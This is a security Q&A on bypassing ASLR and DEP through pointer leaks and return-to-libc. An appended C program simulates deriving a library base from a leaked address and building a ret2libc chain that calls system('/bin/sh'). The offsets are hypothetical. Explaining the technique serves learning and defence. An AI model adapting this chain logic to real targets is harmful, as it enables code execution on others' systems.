
I have read some articles about bypassing DEP and ASLR, but it seems that they bypass ASLR and DEP by using the instructions in the modules that do not apply ASLR. But how do you bypass ASLR and DEP in the modules that apply both of these two protections?

freedom2
  • This question is answered in the accepted answer of this question: https://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work – Snappie Jul 02 '17 at 10:51

1 Answer


Like you said, first ASLR will have to be defeated before any DEP circumvention can be applied. This is usually done by leaking pointers with a separate memory disclosure vulnerability. Then when the location of the code pages is known, the usual technique of a return to libc can be applied.

J.A.K.
  • How can leaking a pointer with a separate memory disclosure vulnerability be used to bypass ASLR? I have seen [this question](http://security.stackexchange.com/questions/22989/how-leaking-pointers-to-bypass-dep-aslr-works), but I do not understand it quite well – freedom2 Feb 23 '17 at 02:23
  • ASLR is randomization. If you knew the place beforehand, or you could know the layout while performing the exploit, you can adjust your offsets and gain control. The main point is that ASLR does not prevent control of EIP, but tries to make it useless. – J.A.K. Feb 23 '17 at 07:54
  • @freedom2: ASLR bypass is only for programs that use networking: by leaking data to your server or your local program you guess the memory layout and generate an exploit that will cause a jump to the correct address for a ROP chain by corrupting allocated size info. If your program doesn't even perform a DNS request, then I think ASLR isn't only a mitigation: it completely prevents remote code execution in the case of buffer overflows https://security.stackexchange.com/q/154310/36301 *(you have to find other kinds of vulnerabilities for code execution)*. – user2284570 Mar 19 '17 at 22:55
  • This is incorrect @user2284570. In fact the opposite is true. ASLR is most useful over the network, because infoleaks of that type over the network are rare. For a local attacker, ASLR is actually _easy_ to bypass, e.g. by using timing attacks. – forest Nov 29 '17 at 03:53
  • @Baal-zebub: I was talking about remote attacks that can't use networking. Things like a buffer overrun inside a .rar archiver. – user2284570 Nov 29 '17 at 04:26
  • Oh, you mean scriptless exploits, like rar exploits, a video or audio format exploit, etc. as opposed to already executing code trying to exploit another program, or trying to exploit over the network? – forest Nov 29 '17 at 04:29
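The leak-then-rebase step the answer describes, as an added example that is not part of the original answer or its comments. ASLR moves the load base of a module on every run, but the distance between any two things inside that module (a function, a gadget, a string) never changes. So one leaked absolute address plus an offset table read from a local copy of the same library build is enough to compute the base and rebase a whole ret2libc chain. The offsets and the base-selection routine below are hypothetical, stand-ins for real libc symbol offsets and the loader's randomization, so the model runs offline:

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef uint64_t addr_t;
#define PAGE_SIZE 0x1000ULL

/* Offsets inside the library image. Hypothetical numbers standing in for
 * what an attacker reads out of a local copy of the victim's libc build
 * (readelf/objdump/ROPgadget); they are NOT real glibc offsets. */
enum { SYM_PUTS, SYM_SYSTEM, SYM_POP_RDI_RET, SYM_BINSH, SYM_COUNT };
static const addr_t sym_off[SYM_COUNT] = {
    0x80e50,  /* puts                 */
    0x4f420,  /* system               */
    0x2155f,  /* pop rdi ; ret gadget */
    0x1b3e9a, /* "/bin/sh" string     */
};

/* ---- victim side: a library mapped at a random page-aligned base ---- */
typedef struct { addr_t base; } module_t;

/* splitmix64, used only to simulate the loader's random base choice. */
static uint64_t next_random(uint64_t *state) {
    uint64_t z = (*state += 0x9e3779b97f4a7c15ULL);
    z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
    z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
    return z ^ (z >> 31);
}

/* Simulated ASLR: each "process" (seed) gets a different base, while the
 * offsets in sym_off stay fixed. That invariant is what the leak exploits. */
static module_t load_module(uint64_t seed) {
    uint64_t r = next_random(&seed);
    module_t m = { .base = 0x7f0000000000ULL + (r & 0xfffffffULL) * PAGE_SIZE };
    return m;
}

/* What the separate memory-disclosure bug hands over: one absolute code
 * address, e.g. puts read out of the GOT via a format string or over-read. */
static addr_t leak_puts_address(const module_t *m) {
    return m->base + sym_off[SYM_PUTS];
}

/* ---- attacker side ---- */
/* base = leaked address - known offset of the leaked symbol. */
static addr_t recover_base(addr_t leaked_puts) {
    return leaked_puts - sym_off[SYM_PUTS];
}

/* Check a practitioner always makes: shared objects are mapped on a page
 * boundary, so a misaligned "base" means the leaked pointer was not puts,
 * or the offset table came from a different libc build. */
static int base_is_plausible(addr_t base) {
    return base != 0 && (base & (PAGE_SIZE - 1)) == 0;
}

/* ret2libc chain for x86-64 SysV: pop rdi ; ret  <-  &"/bin/sh"  ;  system.
 * (A live chain may need one extra `ret` before system for 16-byte stack
 * alignment; left out here because nothing executes these addresses.) */
static size_t build_chain(addr_t base, addr_t *chain, size_t cap) {
    if (cap < 3 || !base_is_plausible(base)) return 0;
    chain[0] = base + sym_off[SYM_POP_RDI_RET];
    chain[1] = base + sym_off[SYM_BINSH];
    chain[2] = base + sym_off[SYM_SYSTEM];
    return 3;
}

/* End to end for one ASLR instance: 1 if the rebased chain lands on the
 * victim's real gadget, string and system() addresses, else 0. */
static int exploit_round_trip(uint64_t seed) {
    module_t victim = load_module(seed);
    addr_t leaked = leak_puts_address(&victim);
    addr_t chain[3];
    if (build_chain(recover_base(leaked), chain, 3) != 3) return 0;
    return chain[0] == victim.base + sym_off[SYM_POP_RDI_RET]
        && chain[1] == victim.base + sym_off[SYM_BINSH]
        && chain[2] == victim.base + sym_off[SYM_SYSTEM];
}

int main(void) {
    for (uint64_t seed = 1; seed <= 3; seed++) {
        module_t victim = load_module(seed);
        addr_t leaked = leak_puts_address(&victim);
        addr_t chain[3];
        size_t n = build_chain(recover_base(leaked), chain, 3);
        printf("run %" PRIu64 ": leaked puts=%#" PRIx64 " -> base=%#" PRIx64
               " -> system=%#" PRIx64 " (%s)\n",
               seed, leaked, recover_base(leaked), n ? chain[2] : 0,
               exploit_round_trip(seed) ? "chain rebased" : "FAILED");
    }
    return 0;
}
```

Every run prints a different base and a different absolute address for system, yet the chain lines up each time, because only one subtraction and three additions separate the leaked pointer from a working ret2libc payload. The page-alignment check is the cheap guard against the two usual ways this goes wrong in practice: the disclosure returned something other than the symbol you assumed, or the offset table was taken from a libc that does not match the target.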